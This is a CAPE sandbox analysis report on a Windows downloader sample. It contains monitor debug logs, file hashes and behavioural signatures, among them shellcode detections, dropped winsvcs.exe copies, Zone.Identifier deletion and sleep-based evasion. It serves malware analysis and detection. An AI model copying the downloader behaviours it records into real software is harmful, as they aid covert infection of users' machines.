2019-01-10 03:38:09,714 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x500000-0x5321f1.
2019-01-10 03:38:09,714 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\1304_715938710412019
2019-01-10 03:38:09,762 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1304_715938710412019
2019-01-10 03:38:09,778 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x52de20 - 0x5321f1.
2019-01-10 03:38:09,778 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x52de20.
2019-01-10 03:38:09,792 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x500000.
2019-01-10 03:38:09,809 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:38:09,825 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:38:09,825 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:38:09,839 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:38:09,839 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:38:09,855 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:38:09,855 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:38:09,887 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1304_856938710412019
2019-01-10 03:38:09,887 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:38:09,903 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:38:09,917 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:38:09,917 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:38:10,931 [root] INFO: Notified of termination of process with pid 1304.
2019-01-10 03:38:11,914 [root] INFO: Process with pid 1304 has terminated
2019-01-10 03:38:13,069 [root] INFO: Announced 32-bit process name: 3304035876.exe pid: 1936
2019-01-10 03:38:13,069 [root] INFO: Added new process to list with pid: 1936
2019-01-10 03:38:13,085 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:13,101 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:13,115 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1936
2019-01-10 03:38:13,147 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:13,147 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3f0000
2019-01-10 03:38:13,147 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:13,163 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:13,178 [root] INFO: Monitor successfully loaded in process with pid 1936.
2019-01-10 03:38:27,437 [root] INFO: Announced 32-bit process name: 2400240831.exe pid: 2620
2019-01-10 03:38:27,453 [root] INFO: Added new process to list with pid: 2620
2019-01-10 03:38:27,453 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:27,483 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:27,483 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2620
2019-01-10 03:38:27,499 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:27,499 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:38:27,515 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:27,515 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:27,530 [root] INFO: Monitor successfully loaded in process with pid 2620.
2019-01-10 03:38:27,765 [root] DEBUG: ProtectionHandler: Address: 0x2cde20, RegionSize: 0x43d1
2019-01-10 03:38:27,779 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x2cde20
2019-01-10 03:38:27,796 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x2cde20, AllocationSize: 0x43d1, ThreadId: 0xa24
2019-01-10 03:38:27,811 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x2cde20 and Type=0x0.
2019-01-10 03:38:27,826 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x2cde20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:38:27,842 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x2cde20
2019-01-10 03:38:27,858 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x2cde20
2019-01-10 03:38:27,874 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x2cde20.
2019-01-10 03:38:27,874 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x2a0000, size 0x321f1).
2019-01-10 03:38:27,888 [root] DEBUG: DumpPEsInRange: Scanning range 0x2a0000 - 0x2d21f1.
2019-01-10 03:38:27,888 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x2a0000-0x2d21f1.
2019-01-10 03:38:27,888 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2620_8892738710412019
2019-01-10 03:38:27,921 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2620_8892738710412019
2019-01-10 03:38:27,921 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x2cde20 - 0x2d21f1.
2019-01-10 03:38:27,936 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x2cde20.
2019-01-10 03:38:27,951 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x2a0000.
2019-01-10 03:38:27,967 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:38:27,967 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:38:27,983 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:38:27,999 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:38:28,013 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:38:28,029 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:38:28,029 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:38:28,092 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2620_452838710412019
2019-01-10 03:38:28,108 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:38:28,108 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:38:28,122 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:38:28,138 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:38:29,168 [root] INFO: Notified of termination of process with pid 2620.
2019-01-10 03:38:29,855 [root] INFO: Process with pid 2620 has terminated
2019-01-10 03:38:31,040 [root] INFO: Announced 32-bit process name: 2686919881.exe pid: 224
2019-01-10 03:38:31,040 [root] INFO: Added new process to list with pid: 224
2019-01-10 03:38:31,055 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:31,072 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:31,086 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 224
2019-01-10 03:38:31,118 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:31,134 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:38:31,150 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:31,164 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:31,180 [root] INFO: Monitor successfully loaded in process with pid 224.
2019-01-10 03:38:45,798 [root] INFO: Announced 32-bit process name: 2293722122.exe pid: 2392
2019-01-10 03:38:45,845 [root] INFO: Added new process to list with pid: 2392
2019-01-10 03:38:45,923 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:46,095 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:46,203 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2392
2019-01-10 03:38:46,328 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:46,453 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2e0000
2019-01-10 03:38:46,578 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:46,733 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:46,858 [root] INFO: Monitor successfully loaded in process with pid 2392.
2019-01-10 03:38:47,140 [root] DEBUG: ProtectionHandler: Address: 0x52de20, RegionSize: 0x43d1
2019-01-10 03:38:47,265 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x52de20
2019-01-10 03:38:47,421 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x52de20, AllocationSize: 0x43d1, ThreadId: 0x298
2019-01-10 03:38:47,529 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x52de20 and Type=0x0.
2019-01-10 03:38:47,608 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x52de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:38:47,638 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x52de20
2019-01-10 03:38:47,654 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x52de20
2019-01-10 03:38:47,654 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x52de20.
2019-01-10 03:38:47,654 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x500000, size 0x321f1).
2019-01-10 03:38:47,654 [root] DEBUG: DumpPEsInRange: Scanning range 0x500000 - 0x5321f1.
2019-01-10 03:38:47,670 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x500000-0x5321f1.
2019-01-10 03:38:47,670 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2392_6704738710412019
2019-01-10 03:38:47,700 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2392_6704738710412019
2019-01-10 03:38:47,700 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x52de20 - 0x5321f1.
2019-01-10 03:38:47,700 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x52de20.
2019-01-10 03:38:47,700 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x500000.
2019-01-10 03:38:47,717 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:38:47,717 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:38:47,717 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:38:47,733 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:38:47,733 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:38:47,733 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:38:47,733 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:38:47,763 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2392_7334738710412019
2019-01-10 03:38:47,763 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:38:47,795 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:38:47,795 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:38:47,795 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:38:48,825 [root] INFO: Notified of termination of process with pid 2392.
2019-01-10 03:38:49,292 [root] INFO: Announced 32-bit process name: 1227434603.exe pid: 2932
2019-01-10 03:38:49,308 [root] INFO: Added new process to list with pid: 2932
2019-01-10 03:38:49,308 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:49,338 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:49,355 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2932
2019-01-10 03:38:49,371 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:49,371 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:38:49,385 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:49,401 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:49,401 [root] INFO: Process with pid 2392 has terminated
2019-01-10 03:38:49,417 [root] INFO: Monitor successfully loaded in process with pid 2932.
2019-01-10 03:38:57,108 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 03:38:57,217 [root] INFO: Created shutdown mutex.
2019-01-10 03:38:58,293 [root] INFO: Setting terminate event for process 2912.
2019-01-10 03:38:58,809 [root] INFO: Setting terminate event for process 1340.
2019-01-10 03:38:59,322 [root] INFO: Setting terminate event for process 2572.
2019-01-10 03:38:59,854 [root] INFO: Setting terminate event for process 2884.
2019-01-10 03:39:00,461 [root] INFO: Setting terminate event for process 1352.
2019-01-10 03:39:01,039 [root] INFO: Setting terminate event for process 2332.
2019-01-10 03:39:01,648 [root] INFO: Setting terminate event for process 2436.
2019-01-10 03:39:02,272 [root] INFO: Setting terminate event for process 2208.
2019-01-10 03:39:02,895 [root] INFO: Setting terminate event for process 2604.
2019-01-10 03:39:03,519 [root] INFO: Setting terminate event for process 1356.
2019-01-10 03:39:04,049 [root] INFO: Setting terminate event for process 1936.
2019-01-10 03:39:04,331 [root] INFO: Announced 32-bit process name: 2673932424.exe pid: 2396
2019-01-10 03:39:04,346 [root] INFO: Added new process to list with pid: 2396
2019-01-10 03:39:04,346 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:39:04,346 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:39:04,361 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2396
2019-01-10 03:39:04,378 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:39:04,392 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:39:04,408 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:39:04,408 [root] INFO: Disabling sleep skipping.
2019-01-10 03:39:04,424 [root] INFO: Monitor successfully loaded in process with pid 2396.
2019-01-10 03:39:04,565 [root] INFO: Setting terminate event for process 224.
2019-01-10 03:39:04,611 [root] DEBUG: ProtectionHandler: Address: 0x57de20, RegionSize: 0x43d1
2019-01-10 03:39:04,611 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x57de20
2019-01-10 03:39:04,627 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x57de20, AllocationSize: 0x43d1, ThreadId: 0x97c
2019-01-10 03:39:04,642 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x57de20 and Type=0x0.
2019-01-10 03:39:04,642 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x57de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:39:04,658 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x57de20
2019-01-10 03:39:04,690 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x57de20
2019-01-10 03:39:04,704 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x57de20.
2019-01-10 03:39:04,704 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x550000, size 0x321f1).
2019-01-10 03:39:04,720 [root] DEBUG: DumpPEsInRange: Scanning range 0x550000 - 0x5821f1.
2019-01-10 03:39:04,720 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x550000-0x5821f1.
2019-01-10 03:39:04,720 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2396_721439710412019
2019-01-10 03:39:04,767 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2396_721439710412019
2019-01-10 03:39:04,782 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x57de20 - 0x5821f1.
2019-01-10 03:39:04,815 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x57de20.
2019-01-10 03:39:04,815 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x550000.
2019-01-10 03:39:04,845 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:39:04,861 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:39:04,861 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:39:04,877 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:39:04,892 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:39:04,907 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:39:04,924 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:39:04,954 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2396_939439710412019
2019-01-10 03:39:04,954 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:39:04,970 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:39:04,970 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:39:04,986 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:39:05,079 [root] INFO: Setting terminate event for process 2932.
2019-01-10 03:39:05,595 [root] INFO: Setting terminate event for process 2396.
2019-01-10 03:39:06,000 [root] INFO: Notified of termination of process with pid 2396.
2019-01-10 03:39:06,108 [root] INFO: Shutting down package.
2019-01-10 03:39:06,108 [root] INFO: Stopping auxiliary modules.
2019-01-10 03:39:06,125 [root] INFO: Finishing auxiliary modules.
2019-01-10 03:39:06,141 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 03:39:06,155 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-01-10 03:35:21 2019-01-10 03:39:21

File Details

File Name 2019-01-08-initial-malware-retrieved-by-JS-file.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
SHA512 9872bcfd51d5e05d17ad23410326744c13d6d757a998867043a906475cde22daa0ab523bedbf430b8e48043c340e382c74978089ecf0e39cd56d4797b60cc09d
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
TrID
  • 61.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 13.0% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 8.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.0% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.0% (.EXE) Clipper DOS Executable (2018/12)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2992 trigged the Yara rule 'embedded_pe'
Hit: PID 2992 trigged the Yara rule 'shellcode'
Hit: PID 2912 trigged the Yara rule 'embedded_pe'
Hit: PID 2912 trigged the Yara rule 'shellcode'
Hit: PID 2744 trigged the Yara rule 'embedded_pe'
Hit: PID 2744 trigged the Yara rule 'shellcode'
Hit: PID 1340 trigged the Yara rule 'embedded_pe'
Hit: PID 1340 trigged the Yara rule 'shellcode'
Hit: PID 2956 trigged the Yara rule 'embedded_pe'
Hit: PID 2956 trigged the Yara rule 'shellcode'
Hit: PID 1132 trigged the Yara rule 'embedded_pe'
Hit: PID 1132 trigged the Yara rule 'shellcode'
Hit: PID 2528 trigged the Yara rule 'embedded_pe'
Hit: PID 2528 trigged the Yara rule 'shellcode'
Hit: PID 2572 trigged the Yara rule 'embedded_pe'
Hit: PID 2572 trigged the Yara rule 'shellcode'
Hit: PID 3008 trigged the Yara rule 'embedded_pe'
Hit: PID 3008 trigged the Yara rule 'shellcode'
Hit: PID 2924 trigged the Yara rule 'embedded_pe'
Hit: PID 2924 trigged the Yara rule 'shellcode'
Hit: PID 2420 trigged the Yara rule 'embedded_pe'
Hit: PID 2420 trigged the Yara rule 'shellcode'
Hit: PID 1304 trigged the Yara rule 'embedded_pe'
Hit: PID 1304 trigged the Yara rule 'shellcode'
Hit: PID 2620 trigged the Yara rule 'embedded_pe'
Hit: PID 2620 trigged the Yara rule 'shellcode'
Hit: PID 2392 trigged the Yara rule 'embedded_pe'
Hit: PID 2392 trigged the Yara rule 'shellcode'
Hit: PID 2396 trigged the Yara rule 'embedded_pe'
Hit: PID 2396 trigged the Yara rule 'shellcode'
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
DeletedFile: C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3751939260.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1865041414.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2080821079.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1257032286.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1674519319.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3065331339.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3876917383.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2810629864.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3750816931.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1398632723.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\4032832645.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1674315261.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2459023548.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3304035876.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2400240831.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2686919881.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2293722122.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1227434603.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2673932424.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
DeletedFile: C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1495120250.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1717238076.exe:Zone.Identifier
A process attempted to delay the analysis task.
Process: winsvcs.exe tried to sleep 1473 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: 4X6zg5pg.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
